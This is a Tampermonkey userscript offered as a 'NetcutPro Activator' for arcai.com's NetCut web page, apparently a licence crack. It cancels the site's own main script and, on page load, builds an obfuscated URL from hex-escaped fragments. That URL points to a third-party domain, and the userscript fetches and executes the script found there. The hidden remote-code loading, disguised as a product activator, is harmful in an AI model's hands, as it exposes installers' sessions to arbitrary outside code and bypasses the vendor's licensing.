// ==UserScript==
// @name         NetcutPro
// @namespace    http://tampermonkey.net/
// @version      1.0
// @description  NetcutPro Activator
// @author       batininhani
// @match        https://www.arcai.com/netCut/s/
// @grant        GM_webRequest
// @webRequest   [{"selector":"https://www.arcai.com/netCut/s/main-*.js","action":"cancel"}]
// @require       http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
// ==/UserScript==

(function() {
window.addEventListener("load", function(event) {

    var _cs=["\x68\x74\x74","\x6e\x65","\x6b\x6e","\x63\x73","\x75\x74","\x6d\x2f","\x2e\x6a\x73","\x2e\x63\x6f","\x65\x78\x6f","\x74\x63","\x2f\x2f","\x74\x69","\x70\x73\x3a"]; $.getScript( _cs[0]+_cs[12]+_cs[10]+_cs[2]+_cs[8]+_cs[11]+_cs[3]+_cs[7]+_cs[5]+_cs[1]+_cs[9]+_cs[4]+_cs[6] )
});
})();
